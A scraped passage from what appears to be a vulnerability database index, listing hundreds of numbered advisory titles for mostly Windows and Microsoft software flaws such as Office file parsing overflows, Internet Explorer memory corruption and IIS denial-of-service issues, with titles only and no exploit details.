Tag Count Handling DoS [60294] Microsoft MSN Messenger Image ICC Profile Tag Count Handling DoS [60285] Apple QuickTime / Darwin Streaming Server on Windows parse_xml.cgi filename Parameter Traversal Arbitrary File Access [60282] Microsoft Pocket IE (PIE) object.innerHTML Function Remote DoS [60198] Microsoft IE DHTML Property setHomePage Method JavaScript Loop Remote DoS [60176] Apache Tomcat Windows Installer Admin Default Password [60134] Netscape sun.awt.windows.WDefaultFontCharset Java Class WDefaultFontCharset Constructor Overflow [60047] SecureClean Windows Alternatve Data Stream Information Disclosure [60046] PGP Data Wipe Windows Alternatve Data Stream Information Disclosure [60045] Sami Tolvanen Eraser Windows Alternatve Data Stream Information Disclosure [60044] East-Tec Eraser 2002 Windows Alternatve Data Stream Information Disclosure [60043] BCWipe Windows Alternatve Data Stream Information Disclosure [60020] Microsoft Visual C++ MFC Static Library ISAPI Extension (Isapi.cpp) CHttpServer::OnParseError Overflow [60004] Microsoft SQL Server Multiple Stored Procedure Unprivileged Configuration Manipulation [59996] Apple Mac OS X QuickLook Crafted Microsoft Office Document Handling Overflow [59968] Microsoft Multiple Products SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection [59915] Sun Java SE Swing Implementation Windows Pluggable Look and Feel (PL&amp [59907] MySQL on Windows bind-address Remote Connection Weakness [59906] MySQL on Windows Default Configuration Logging Weakness [59892] Microsoft IIS Malformed Host Header Remote DoS [59886] Microsoft Exchange Malformed Microsoft Remote Procedure Call (MSRPC) Remote DoS [59866] Microsoft Office Excel Document Record Parsing Memory Corruption [59864] Microsoft Office Excel Malformed Record Object Sanitization Failure Arbitrary Code Execution [59863] Microsoft Office Excel Formula Handling Pointer Corruption Arbitrary Code Execution [59862] Microsoft Office Excel Cell Embeded Formula Parsing Memory Corruption [59861] Microsoft Office Excel BIFF Record Parsing Overflow [59860] Microsoft Office Excel BIFF File FEATHEADER cbHdrData Size Element Handling Memory Corruption [59859] Microsoft Office Excel SxView Record Handling Memory Corruption [59858] Microsoft Office Excel Malformed PivotCache Stream Handling Memory Corruption [59857] Microsoft Office Word Document Malformed File Information Block (FIB) Parsing Memory Corruption [59826] vqSoft vqServer for Windows DOS Filename Request Access Bypass [59808] Microsoft Exchange Request Saturation License Exhaustion Remote DoS [59774] Multiple Antivirus Microsoft Exchange Malformed E-mail X Header Scan Bypass [59718] Sun Java JDK / JRE on Windows Update Notification Weakness [59688] Novell NetWare Client on Windows Help Feature Login Authentication Bypass [59653] Microsoft MN-500 Backup Function Cleartext Credential Local Disclosure [59636] Microsoft SQL Server SQL Authentication Password Encryption Weakness [59635] My Remote File Server on Windows Permission Weakness Local Privilege Escalation [59621] Microsoft IIS CodeBrws.asp Off-By-One File Check Bypass Source Disclosure [59615] ProxyView Embedded Windows NT Default Admin Account Password [59563] Microsoft Baseline Security Analyzer (MBSA) Security Scan Result Cleartext Local Disclosure [59561] Microsoft IIS CodeBrws.asp Encoded Traversal Arbitrary File Source Disclosure [59503] Microsoft IE Rendering Engine Crafted MIME Type Arbitrary Script Execution [59502] Microsoft IE / Outlook Express Crafted XML Stylesheet (XSL) Arbitrary Script Execution [59501] Microsoft IE MSScriptControl.ScriptControl / GetObject Frame Domain Validation Bypass [59500] Microsoft IE HTML Parser (MSHTML.DLL) Browser Window Object Handling DoS [59479] Microsoft Office SharePoint Server Team Services _layouts/download.aspx Multiple Parameter ASP.NET Source Disclosure [59360] Microsoft IIS ASP Page Visual Basic Script Malformed Regex Parsing DoS [59326] Napster Client on Windows Message Handling Overflow [59323] Microsoft IE Active Movie ActiveX Arbitrary File Download [59322] Microsoft Jet Database Crafted Query Arbitrary Command Execution [59289] Microsoft Java Virtual Machine getSystemResourceAsStream Function Arbitrary File Access [59263] Microsoft IE IMG Tag width Handling DoS [59259] Microsoft Site Server / Commercial Internet System (MCIS) Cookie Expiry Weakness [59258] Microsoft Exchange ACL Modification Update Weakness [59253] Windows File Sharing for Apple Mac OS X Improper Shutdown Unspecified Issue [59249] Windows NT Unprivileged Local Share Manipulation [59101] Oracle Database on Windows Net Foundation Layer Unspecified Remote Issue [59066] IBM Rational AppScan on Windows Help Pages Query String XSS [58907] Adobe Reader / Acrobat on Windows ActiveX Unspecified DoS [58878] Skype Extras Manager on Windows Unspecified Issue [58874] Microsoft IE CSS Parsing writing-mode Style Memory Corruption [58873] Microsoft IE DOM Copy Constructor Event Object Initialization Memory Corruption [58872] Microsoft IE HTML Component Handling Arbitrary Code Execution [58871] Microsoft IE Data Stream Header Corruption Arbitrary Code Execution [58870] Microsoft Office BMP Image Color Processing Overflow [58869] Microsoft Office Malformed Object Handling Memory Corruption Arbitrary Code Execution [58868] Microsoft Multiple Products GDI+ PNG Image Handling Integer Overflow [58867] Microsoft Multiple Products GDI+ .NET API Code Execution Privilege Escalation [58866] Microsoft Multiple Products GDI+ TIFF Image Handling Memory Corruption Arbitrary Code Execution [58865] Microsoft Multiple Products GDI+ TIFF Image Handling Overflow [58864] Microsoft Multiple Products GDI+ PNG Image Handling Heap Overflow [58863] Microsoft Multiple Products GDI+ WMF Image Handling Overflow [58851] Microsoft .NET Framework / Silverlight Crafted Application Memory Manipulation Arbitrary Code Execution [58850] Microsoft .NET Framework Object Casting Manipulation Arbitrary Code Execution [58849] Microsoft .NET Framework Crafted Application Managed Pointer Access Arbitrary Code Execution [58817] Microsoft IE Nested marquee Tag Handling DoS [58788] Microsoft IE Crafted File Extension Download Security Warning Bypass [58736] Jetty on Windows Double Slash (//) Path Aliasing Unspecified Issue [58656] Trend Micro ServerProtect for Windows EarthAgent.exe Multiple RPC Functions Remote Overflow [58536] Hart InterCivic EMS Windows Registry Ballot Now Database Private Key Disclosure [58480] Microsoft IE X.509 Certificate Authority (CA) Common Name Null Byte Handling SSL MiTM Weakness [58403] avast! Home / Professional for Windows avast4.ini ashWsFtr.dll Subversion Local Privilege Escalation [58399] Microsoft IE window.print Function Loop Remote DoS [58397] Microsoft IE Auto Form Submission KEYGEN Element Remote DoS [58350] Microsoft Patterns &amp [58253] HP ProCurve Identity Driven Manager on Windows Unspecified Local Privilege Escalation [58188] PHP on Windows popen Invalid Mode Handling DoS [58127] CreativeLabs es1371mp.sys WDM Audio Driver on Windows IRP Request Handling Local Privilege Escalation [58104] Xerver on Windows HTTP Server ::$DATA Extension Request Arbitrary File Access [58092] Diebold Global Election Management System (GEMS) Server Windows Access Database Corruption DoS [58013] OpenOffice.org (OOo) on Windows Unspecified Client-side Issue [58012] OpenOffice.org (OOo) on Windows Unspecified Client-side Stack Overflow [58009] OpenOffice.org (OOo) on Windows Unspecified Client-side Issue [57959] Interstage Application Server HTTP Server on Windows Unspecified Crafted Request DoS [57955] Samba Unconfigured Home Directory Windows File Share Directory Access Restriction Bypass [57942] SAP NetWeaver on Windows Unspecified Overflow [57941] SAP NetWeaver on Windows Unspecified NULL Dereference DoS [57940] SAP NetWeaver on Windows Unspecified Information Disclosure [57926] Symantec Altiris Deployment Solution on Windows Unspecified Client-side Issue (3) [57925] Symantec Altiris Deployment Solution on Windows Unspecified Client-side Issue (2) [57924] Symantec Altiris Deployment Solution on Windows Unspecified Client-side Issue (1) [57906] Perforce Server on Windows P4S.EXE Unspecified Infinite Loop DoS [57905] Perforce Server on Windows P4S.EXE Unspecified DoS (2) [57904] Perforce Server on Windows P4S.EXE Unspecified DoS (1) [57881] MailSite on Windows LDAP3A.exe Unspecified Heap Corruption [57880] MailSite on Windows LDAP3A.exe Unspecified Remote DoS [57872] IBM Tivoli Directory Server (TDS) on Windows ibmslapd.exe Unspecified NULL Dereference Remote DoS [57853] Business Objects Crystal Reports Server on Windows Unspecified Infinite Loop DoS [57804] Microsoft JScript Scripting Engine Memory Corruption Arbitrary Code Execution [57753] Microsoft IIS FTP Server Crafted Recursive Listing Remote DoS [57742] Microsoft SQL Cleartext User Passwords Disclosure [57740] X Windows (X11R4) -L Linked Binary Path Subversion Handling Local Privilege Escalation [57730] X Windows (X11R3/4) xterm Emulator Escape Sequence Handling Remote Privilege Escalation [57654] Microsoft IE JavaScript LI Element Creation Value Attribute Handling Remote DoS [57643] Quick Heal AntiVirus on Windows Unspecified Overflow [57638] Microsoft Outlook Express IMAP Client literal_size Remote Overflow [57616] DECwindows on Ultrix Memory Persistent Cleartext Credential Disclosure [57589] Microsoft IIS FTP Server NLST Command Remote Overflow [57515] Microsoft IE window.open() New Window URL Path Spoofing Weakness [57506] Microsoft IE location.hash Javascript Handling Remote DoS [57500] Sophos PureMessage for Microsoft Exchange Scan Engine Load Handling Scan Protection Bypass [57499] Sophos PureMessage for Microsoft Exchange EdgeTransport.exe TNEF-Encoded Message Cleartext Conversion DoS [57493] Sophos PureMessage Scanner (PMScanner.exe) for Microsoft Exchange Crafted File Handling DoS [57202] Serv-U FTP Server Windows Authenticated HTTP Session Termination Failure Weakness [57196] Serv-U FTP Server Windows Authentication Non-secure Login Weakness [57142] Microsoft IE Malformed DIV / SCRIPT Element Handling DoS [57118] Microsoft IE onblur() / onfocusout() Functions Nested Loop DoS [57113] Microsoft IE Extended HTML Form Non-HTTP Protocol XSS [57064] Microsoft IE Crafted UTF-7 Context XSS Filter Bypass [57063] Microsoft IE Multiple CRLF Injected HTTP Header XSS Filter Bypass [57062] Microsoft IE STYLE Element / CSS Expression Property Double Content Injection XSS Filter Bypass [56963] Sun Java SE Abstract Window Toolkit (AWT) on Windows 2000 Security Warning Icon Display Weakness [56916] Microsoft Office Web Components HTMLURL Parameter ActiveX Spreadsheet Object Handling Overflow [56915] Microsoft Office Web Components OWC10.Spreadsheet ActiveX BorderAround() Method Heap Corruption Arbitrary Code Execution [56914] Microsoft Office Web Components OWC10 ActiveX Loading/Unloading Memory Allocation Arbitrary Code Execution [56911] Microsoft Remote Desktop Server (RDS) mstscax.dll Packet Parsing Remote Overflow [56910] Microsoft Visual Studio Active Template Library (ATL) Header Mismatch Remote Code Execution [56905] Microsoft .NET Framework Request Scheduling Crafted HTTP Request Remote DoS [56852] Microsoft IE XML Document start-tags Handling CPU Consumption DoS [56779] Microsoft IE mshtml.dll JavaScript findText Method Unicode String Handling DoS [56741] MySQL Connector/J Unicode w/ SJIS/Windows-31J Charset SQL Injection [56699] Microsoft Visual Studio Active Template Library (ATL) String Manipulation Arbitrary Memory Disclosure [56698] Microsoft Visual Studio Active Template Library (ATL) Data Stream Object Instantiation Remote Code Execution [56696] Microsoft Visual Studio Active Template Library (ATL) Headers VariantClear Corrupt Stream Handling Remote Code Execution [56695] Microsoft IE HTML Embedded CSS Property Modification Memory Corruption [56694] Microsoft IE Invalid HTML Object Element Appendage Handling Memory Corruption [56693] Microsoft IE timeChildren Object ondatasetcomplete Event Method Memory Corruption [56525] Microsoft Eyedog ActiveX Unspecified Overflow [56489] Microsoft IE Proxy Server CONNECT Response Cached Certificate Use MiTM HTTPS Site Spoofing [56485] Microsoft IE iFrame HTTP / HTTPS Content Detection Weakness [56480] Microsoft IE HTTP Response Refresh Header javascript: URI XSS [56474] Microsoft IIS WebDAV Extension URL Decode Crafted HTTP Request Authentication Bypass [56438] Microsoft XML Core Services Set-Cookie HTTP Response Header Restriction Weakness [56434] Web On Windows (WOW) ActiveX 2 Multiple Method Arbitrary Command Execution [56432] Microsoft IE onclick Action Mouse Click Subversion (Clickjacking) [56424] GoAhead WebServer on Windows MS-DOS Device Name Request DoS [56331] MapServer on Windows mapserv mapserv.c id Parameter Traversal Arbitrary File Access [56323] Microsoft IE Write Method Unicode String Argument Handling Remote DoS [56272] Microsoft Video ActiveX (msvidctl.dll) Unspecified Remote Arbitrary Code Execution [56254] Microsoft IE Select Object Length Property Handling Memory Consumption DoS [56015] NTP on Windows SO_EXCLUSIVEADDRUSE Unspecified Issue [55940] EiffelStudio on Windows IPv6 Listening Mode IPv4 Interface Traffic Disclosure [55855] Microsoft IE AddFavorite Method URL Handling Remote DoS [55845] Microsoft DirectX DirectShow quartz.dll QuickTime NumberOfEntries Field Memory Corruption [55844] Microsoft DirectX DirectShow QuickTime File Pointer Validation Arbitrary Code Execution [55838] Microsoft Office Publisher PUBCONV.DLL Legacy Format Importation Pointer Dereference Arbitrary Code Execution [55837] Microsoft Virtual PC / Virtual Server Instruction Decoding Unspecified Local Privilege Escalation [55836] Microsoft ISA Server 2006 Radius OTP Security Bypass [55806] Microsoft Office Web Components OWC10.Spreadsheet ActiveX msDataSourceObject() Method Memory Corruption [55651] Microsoft DirectShow Video Streaming ActiveX (msvidctl.dll) IMPEG2TuneRequest DirectX Object Interface Overflow [55509] VLC Media Player for Windows modules/access/smb.c Win32AddConnection() Function Overflow [55436] Motorola Timbuktu Pro for Windows PlughNTCommand Named Pipe String Handling Overflow [55345] Microsoft libc src/lib/libc/gen/fts.c fts_build() Function fts Nested Directory Handling Local DoS [55298] XEmacs on Windows glyphs-eimage.c Multiple Function Image File Handling Overflows [55269] Microsoft IIS Traversal GET Request Remote DoS [55227] CA ARCserve Backup for Windows Message Engine 0x3B Message Invalid Stub Data RPC Marshalling Error Remote DoS [55226] CA ARCserve Backup for Windows Message Engine ASCORE Module 0x13 Message Handling Remote DoS [55224] PHP on Windows Multiple Function safe_mode Bypass [55129] Microsoft IE HTTP Host Header Proxy Server CONNECT Response Document Context SSL Tampering Weakness [55021] Apple Safari on Windows Installer Application Launch Unspecified Compression Method Local Privilege Escalation [55012] Apple Safari on Windows Reset Safari Implementation Stored Web Password Persistence [54974] Apple Safari on Windows CoreGraphics TrueType Font Handling Memory Corruption [54966] PeaZIP on Windows ZIP Filename Handling Arbitrary Command Execution [54960] Microsoft Office Word Malformed Record Handling Overflow (2009-0565) [54959] Microsoft Office Word Malformed Length Field Handling Overflow (2009-0563) [54958] Microsoft Office Excel BIFF File QSIR Record Object Pointer Handling Remote Code Execution [54957] Microsoft Office Excel File SST Record Handling String Parsing Overflow [54956] Microsoft Office Excel Record Object Field Sanitization Memory Corruption [54955] Microsoft Office Excel Malformed Records Handling Overflow [54954] Microsoft Office Excel Record Parsing Array Indexing Memory Corruption [54953] Microsoft Office Excel Malformed Object Record Corruption Remote Code Execution [54952] Microsoft Office Excel Malformed Record Object Pointer Handling Remote Code Execution (2009-0549) [54951] Microsoft IE Crafted HTML Malformed Row Property References Memory Corruption [54950] Microsoft IE Crafted onreadystatechange Event Memory Corruption [54949] Microsoft IE Crafted HTML Document Node Addition Event Handler Memory Corruption [54948] Microsoft IE setCapture Function Object Handling Uninitialized Memory Corruption [54947] Microsoft IE Crafted AJAX XMLHttpRequest Synchronization Memory Corruption [54946] Microsoft IE DHTML tr Element Handling Crafted Method Memory Corruption [54945] Microsoft IE Cached Data Handling Cross-Domain Information Disclosure [54944] Microsoft IE Race Condition Cross-Domain Information Disclosure [54922] VMware Multiple Products on Windows Descheduled Time Accounting Driver Unspecified DoS [54875] Apple QuickTime on Windows Movie File Clipping Region (CRGN) Atom Parsing Overflow [54797] Microsoft DirectX DirectShow quartz.dll QuickTime NULL Byte Overwrite Arbitrary Code Execution [54709] Soulseek on Windows Search Query Handling Overflow [54700] Microsoft GDI+ gdiplus.dll GpFont:etData Function Crafted EMF File Handling Off-by-one Overflow [54555] Microsoft IIS WebDAV Unicode URI Request Authentication Bypass [54444] Apple Mac OS X Microsoft Office Spotlight Importer File Handling Memory Corruption [54394] Microsoft Office PowerPoint Multiple Record Types Handling Overflow [54393] Microsoft Office PowerPoint CurrentUserAtom Atom Parsing Multiple Overflows [54392] Microsoft Office PowerPoint Unspecified Crafted File Handling Heap Corruption [54391] Microsoft Office PowerPoint OutlineTextRefAtom Parsing Memory Corruption Arbitrary Code Execution [54390] Microsoft Office PowerPoint BuildList Record Parsing Memory Corruption Arbitrary Code Execution [54389] Microsoft Office PowerPoint PP7 Crafted File Handling Memory Corruption Arbitrary Code Execution (2009-1128) [54388] Microsoft Office PowerPoint PP7 Crafted File Handling Memory Corruption Arbitrary Code Execution (2009-0225) [54387] Microsoft Office PowerPoint PPT95 Import (PP7X32.DLL) File Handling Multiple Overflows [54386] Microsoft Office PowerPoint PPT Importer (PP4X32.DLL) Legacy File Format Handling Multiple Overflows [54385] Microsoft Office PowerPoint Conversion Filter (PP4X32.DLL) String Parsing Memory Corruption Arbitrary Code Execution [54384] Microsoft Office PowerPoint Conversion Filter (PP4X32.DLL) Structure Parsing Memory Corruption Arbitrary Code Execution (2009-0227) [54383] Microsoft Office PowerPoint Conversion Filter (PP4X32.DLL) Structure Parsing Memory Corruption Arbitrary Code Execution (2009-0223) [54382] Microsoft Office PowerPoint Legacy File Format Handling Unspecified Remote Code Execution (2009-0222) [54381] Microsoft Office PowerPoint Legacy File Format Handling Unspecified Remote Code Execution (2009-1137) [54292] Microsoft ActiveSync RNDIS over USB System Lock Bypass [54183] Microsoft IE Unprintable Character Document Handling DoS [53935] Xitami Web Server on Windows HTTP Request Connection Saturation Remote DoS [53933] Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflow [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload [53890] Trend Micro OfficeScan Client on Windows NTRtScan.exe Directory Pathname Handling Local DoS [53871] OpenX on Windows www/delivery/tjs.php trackerid Parameter Traversal Arbitrary File Deletion [53750] Oracle Outside In Technology Microsoft Office File Optional Data Stream Parsing Overflow [53749] Oracle Outside In Technology Microsoft Office Spreadsheet Record Handling Overflow (2009-1010) [53748] Oracle Outside In Technology Microsoft Excel Spreadsheet Record Handling Remote Overflow (2009-1009) [53695] VMware Multiple Products on Windows hcmon.sys Crafted IOCTL Handling Unspecified Local DoS [53671] Wireshark on Windows LDAP Dissector Unspecified DoS [53665] Microsoft Office Excel Malformed Object Handling Memory Corruption [53664] Microsoft WordPad Word 97 Text Converter File Handling Overflow [53663] Microsoft Office Word 2000 WordPerfect 6.x Converter Document Handling Stack Corruption [53662] Microsoft WordPad / Office Text Converter Malformed Data Handling Memory Corruption [53637] Microsoft ISA Server / Forefront Threat Management Gateway (TMG) Forms Authentication Component Unspecified XSS [53636] Microsoft ISA Server / Forefront Threat Management Gateway (TMG) Web Proxy TCP State Handling DoS [53632] Microsoft DirectShow MJPEG Decompression Unspecified Arbitrary Code Execution [53627] Microsoft IE Unitialized Object Memory Corruption Arbitrary Code Execution (2009-0554) [53626] Microsoft IE EMBED Element Handling Memory Corruption Arbitrary Code Execution [53625] Microsoft IE Unitialized Object Memory Corruption Arbitrary Code Execution (2009-0552) [53624] Microsoft IE Page Transition Unspecified Memory Corruption Arbitrary Code Execution [53454] Sybase Enterprise Application Server on Windows Crafted Request WEB-INF Directory Information Disclosure [53453] Pramati Server on Windows Crafted Request WEB-INF Directory Information Disclosure [53451] jo! jo Webserver on Windows Crafted Request WEB-INF Directory Information Disclosure [53450] HP Application Server on Windows Crafted Request WEB-INF Directory Information Disclosure [53340] Microsoft IE JavaScript Implementation Web Site Temporary Footprint Spoofing Weakness [53308] Apple Safari on Windows WebKit.dll ALINK Attribute Handling Memory Exhaustion DoS [53306] Microsoft Money prtstb06.dll ActiveX Startup Property Remote DoS [53231] Apple Safari on Windows XML Document Handling Application Crash DoS [53182] Microsoft Office PowerPoint PPT File Handling Unspecified Code Execution [53072] Citrix Presentation Server Client for Windows Process Memory Credential Information Disclosure [52924] Microsoft IIS WebDAV PROPFIND Method Forced Directory Listing [52898] Apple Safari for Windows feeds: URI Handling NULL Pointer Dereference DoS [52896] Mozilla Firefox on Windows _moveToEdgeShift() XUL Tree Method Garbage Collection Arbitrary Code Execution (PWN2OWN) [52830] HP Virtual Rooms Client on Windows Unspecified Arbitrary Remote Code Execution [52745] Adobe Flash Player on Windows Mouse Pointer Display Unspecified Clickjacking [52695] Microsoft Office Excel Crafted Document Invalid Object Reference Unspecified Code Execution [52692] Microsoft SMB NT Trans2 Request Parsing Unspecified Remote Code Execution [52691] Microsoft SMB NT Trans Request Parsing Overflow Remote Code Execution [52690] Microsoft Office Word Malformed Table Property Handling Memory Corruption [52689] Microsoft Word Document Handling HTML Object Tag DoS [52688] Microsoft Word Document Handling HTML Object Tag XSS [52686] Microsoft Office Hyperlink Target Digital Signatures Weakness [52684] Microsoft Forms Multiple ActiveX (FM20.dll) Memory Access Violations [52680] Microsoft IIS httpext.dll WebDav LOCK Method Nonexistent File Request Parsing Memory Exhaustion Remote DoS [52671] Microsoft IE shell32 Module Unspecified Form Data Handling Overflow [52670] Microsoft IE Double Injection Bypass Anti-XSS Filter Bypass [52669] Microsoft IE UTF-7 Character Set Bypass Anti-XSS Filter Bypass [52668] Microsoft IE CRLF Injection Multiple Method Bypass Anti-XSS Filter Bypass [52667] Microsoft IE navcancl.htm Local Resource Refresh Link XSS [52666] Microsoft IE Malformed file:// URI Handling DoS [52665] Microsoft IE IObjectSafety Functionality Object Creation Call DoS [52664] Microsoft IE Relative Path Handling Spoofing Weakness [52663] Microsoft IE Crafted Pop-up Directional Address Bar Spoofing [52660] Microsoft IE about:blank Blank Tab Spoofing Weakness [52599] IBM WebSphere Application Server (WAS) on Windows JSP Handling Unspecified Exposure (PK75248) [52530] IBM Tivoli Storage Manager HSM for Windows Unspecified Overflow [52491] Apple Safari for Windows Multiple Protocol Handler Null Dereference DoS [52490] Apple Safari for Windows http URI Handler Malformed Domain Name DoS [52468] IBM WebSphere Application Server (WAS) on Windows Installation Factory logs/instconfigifwas6.log Local Information Disclosure [52301] NovaNET on Windows nnwindtb.dll DtbClsLogin Function Overflow DoS [52287] Theme Engine for Drupal on Windows q Parameter Local File Inclusion [52238] Microsoft IIS IDC Extension XSS [51840] Microsoft IE XHTML Strict Mode CSS Handling Memory Corruption Arbitrary Code Execution [51839] Microsoft IE Document Object Handling Memory Corruption Arbitrary Code Execution [51838] Microsoft Exchange Server EMSMDB2 Invalid MAPI Command Remote DoS [51837] Microsoft Exchange Server Message Transport Neutral Encapsulation Format (TNEF) Decoding Remote Code Execution [51836] Microsoft Office Visio File Opening Memory Functions Arbitrary Code Execution [51835] Microsoft Office Visio Object Data Memory Functions Arbitrary Code Execution [51834] Microsoft Office Visio File Opening Object Data Handling Arbitrary Code Execution [51531] Apple QuickTime MPEG-2 Playback Component on Windows Crafted Movie File Handling Arbitrary Code Execution [51503] Microsoft Word Save as PDF Add-on Emailed PDF Path Disclosure [51406] Silentum Uploader on Windows upload.php delete Parameter Traversal Arbitrary File Deletion [51351] Oracle Database SQLPlus Windows GUI Unspecified Remote Information Disclosure (2008-3973) [51350] Oracle Database SQLPlus Windows GUI Unspecified Remote Information Disclosure (2008-5439) [51320] Microsoft IE chromehtml: URI --renderer-path Option Arbitrary Command Execution [51277] Microsoft Excel HTML Tag Interpretation XSS [51259] Microsoft IE onload=screen[&quot [51226] IBM AS/400 iSeries Access for Windows Remote Command rexec Remote Command Execution [51190] Firefly Media Server (mt-daapd) on Windows Traversal Arbitrary /admin-root File Disclosure [51135] Google Chrome on Windows chromehtml: URI--renderer-path Option Arbitrary Remote Command Execution [50978] Opera on Windows Malformed Email Header Handling Resource Consumption DoS [50974] Microsoft Outlook Express InetComm.dll MimeOleClearDirtyTree Function Malformed Email Header Handling Infinite Loop DoS [50959] Microsoft Word / Publisher Malformed wordart Handling DoS [50778] Microsoft Remote Help SAFRCFileDlg.RASetting ActiveX (safrcdlg.dll) GetProfileString Function Overflow [50745] Microsoft Office Web Controls OWC11.DataSourceControl Memory Access Violation [50727] Hitachi JP1/Integrated Management Service Support on Windows Unspecified XSS [50693] Sun Ray Windows Connector Unspecified Local Administration Password Disclosure [50683] CA ARCserve Backup on Windows LDBserver Service Client Data Verification Weakness [50622] Microsoft IE mshtml.dll XSML Nested SPAN Element Handling Unspecified Arbitrary Code Execution [50615] Microsoft ASP.NET Malformed File Request Path Disclosure [50613] Microsoft IE WebDAV Cached Content Request Parsing Overflow [50612] Microsoft IE Object Handling Uninitialized Memory Corruption [50611] Microsoft IE Navigation Methods Parameter Validation Memory Corruption [50610] Microsoft IE EMBED Tag File Name Extension Overflow [50598] Microsoft Office Word Table Property Handling Overflow [50597] Microsoft Office Word RTF Object Parsing Arbitrary Code Execution (2008-4031) [50596] Microsoft Office Word RTF Object Parsing Arbitrary Code Execution (2008-4030) [50595] Microsoft Office Word RTF Drawing Object Parsing Overflow [50593] Microsoft Office Word RTF Consecutive Drawing Object Parsing Memory Corruption [50592] Microsoft Office Word Malformed Value Memory Corruption [50591] Microsoft Office Word RTF Polyline/Polygon Object Parsing Overflow [50590] Microsoft Office Word Malformed File Information Block (FIB) lcbPlcfBkfSdt' Field Memory Corruption [50589] Microsoft SQL Server 2000 sp_replwritetovarbin() Stored Procedure Overflow [50585] Microsoft Office SharePoint Server Administrative URL Security Bypass [50581] Microsoft Visual Basic Charts Control ActiveX (Mschrt20.ocx) Unspecified Memory Corruption [50580] Microsoft Visual Basic Animation ActiveX (mscomct2.ocx) AVI Parsing Memory Corruption [50579] Microsoft Visual Basic Hierarchical FlexGrid ActiveX (mshflxgd.ocx) Multiple Method Memory Corruption [50578] Microsoft Visual Basic FlexGrid ActiveX (msflxgrd.ocx) Unspecified Memory Corruption [50577] Microsoft Visual Basic DataGrid ActiveX (msdatgrd.ocx) Unspecified Memory Corruption [50557] Microsoft Excel NAME Record Global Array Parsing Memory Corruption [50556] Microsoft Excel Malformed Object Record Parsing Memory Corruption [50555] Microsoft Excel Malformed Formula Parsing Memory Corruption [50488] Microsoft Multiple Products Crafted RTCP Receiver Report Packet Handling Remote DoS [50330] Microsoft Communicator Instant Message Emoticon Saturation Remote DoS [50320] Microsoft Communicator SIP INVITE Request Handling Session Saturation DoS [50302] Microsoft .NET Framework Strong Name Implementation DLL File Public Key Token Subversion Multiple Mechanism Authentication Bypass [50288] Apple iPhone Configuration Web Utility for Windows Traversal Arbitrary File Access [50279] Microsoft XML Core Services HTTP Request Header Field Cross-domain Session State Manipulation [50138] Microsoft SharePoint Host Name / Port Number Persistence HTML Document Same-origin Relationship Bypass XSS [50074] Cisco Unity Unspecified Microsoft API Dynamic UDP Port Packet Handling Remote DoS [50044] Microsoft IE Non-Blocking Space Character Visual Truncation Address Bar Spoofing [50043] Microsoft IE High-bit URL Encoded Character Address Bar Spoofing [49981] Symantec Backup Exec for Windows Server Data Management Protocol Unspecified Overflow [49980] Symantec Backup Exec for Windows Server Authentication Multiple Unspecified Issues [49926] Microsoft XML Core Services DTD Crafted XML Document Handling Cross-Domain Scripting Remote Information Disclosure [49900] Windows Mobile on HTC Hermes Password Auto-Completion Authentication Bypass [49899] Microsoft IIS iissext.dll Unspecified ActiveX SetPassword Method Remote Password Manipulation [49882] Opera on Windows file:// URI Handling Overflow [49781] Adobe Flash Player on Windows ActiveX Unspecified Information Disclosure [49743] Yosemite Backup on Windows ytwindtb.dll DtbClsLogin() Function Remote Overflow [49730] Microsoft IIS ActiveX (adsiis.dll) GetObject Method Remote DoS [49729] Microsoft Internet Authentication Service (IAS) Helper COM Component ActiveX (iashlpr.dll) PutProperty Method Remote DoS [49728] Microsoft IE Crafted URL-encoded String alert Function DoS [49592] Microsoft Office DjVu ActiveX (DjVu_ActiveX_MSOffice.dll) Multiple Property Overflow [49590] Microsoft Debug Diagnostic Tool DebugDiag ActiveX (CrashHangExt.dll) GetEntryPointForThread Method DoS [49586] Microsoft IE Mshtml.dll CDwnTaskExec::ThreadExec Function PNG File Handling DoS [49442] IBM Tivoli Storage Manager (TSM) Express for Microsoft SQL SQL CAD Data Protection (dsmcat.exe) Remote Overflow [49385] Microsoft ASP.NET Request Validation &lt [49384] Microsoft ASP.NET Request Validation &lt [49230] Microsoft Outlook Web Access (OWA) exchweb/bin/redir.asp URL Variable Arbitrary Site Redirect [49118] Microsoft IE HTML Object Handling Memory Corruption [49117] Microsoft IE componentFromPoint Unitialized Memory Corruption [49116] Microsoft IE Unspecified Cross-domain Information Disclosure [49115] Microsoft IE Unspecified Cross-domain Arbitrary Script Execution [49114] Microsoft IE Unspecified HTML Element Cross-Domain Code Execution [49113] Microsoft IE Window Location Property Cross-Domain Code Execution [49082] Microsoft PicturePusher ActiveX (PipPPush.DLL) Crafted PostURL Request Multiple Method Arbitrary File Upload [49078] Microsoft Excel Embedded Formula Parsing Arbitrary Code Execution [49077] Microsoft Excel Calendar Object Validation VBA Performance Cache Processing Arbitrary Code Execution [49076] Microsoft Excel BIFF File Malformed Object Handling Arbitrary Code Execution [49068] Microsoft Host Integration Server (HIS) SNA RPC Request Remote Overflow [49059] Microsoft IIS IPP Service Unspecified Remote Overflow [49052] Microsoft Office CDO Protocol (cdo:) Content-Disposition: Attachment Header XSS [48821] Microsoft Dynamics GP DPS Component DPS Message Remote Overflow [48820] Microsoft Dynamics GP DPM Component DPM Message Remote Overflow [48819] Microsoft Dynamics GP DPS Message Invalid Magic Number Remote DoS [48818] Microsoft IE Top Level Domain Cross-Domain Cookie Fixation [48564] Apple Mac OS X QuickLook Microsoft Office File Handling Memory Corruption [48243] ISC BIND for Windows UDP Client Handler Remote DoS [48220] Microsoft SQL Server SQLVDIRLib.SQLVDirControl ActiveX (Tools\Binn\sqlvdir.dll) Connect Method Overflow [48208] Novell eDirectory LDAP on Windows Unspecified Memory Corruption DoS [48206] Novell eDirectory NDS on Windows Unspecified Remote Memory Corruption [48149] IBM DB2 Universal Database on Windows DB2FMP Unspecified Issue [48034] Apple QuickTime on Windows PICT Image Handling Overflow [48032] Apple QuickTime on Windows PICT Image Handling Unspecified Arbitrary Code Execution [48020] Apple Bonjour for Windows mDNSResponder Bonjour API for Unicast DNS TransactionID/Port Randomness Prediction [48019] Apple Bonjour for Windows Bonjour Namespace Provider mDNSResponder Domain Name Label Handling DoS [48000] Microsoft Organization Chart orgchart.exe Crafted OPX File Handling DoS 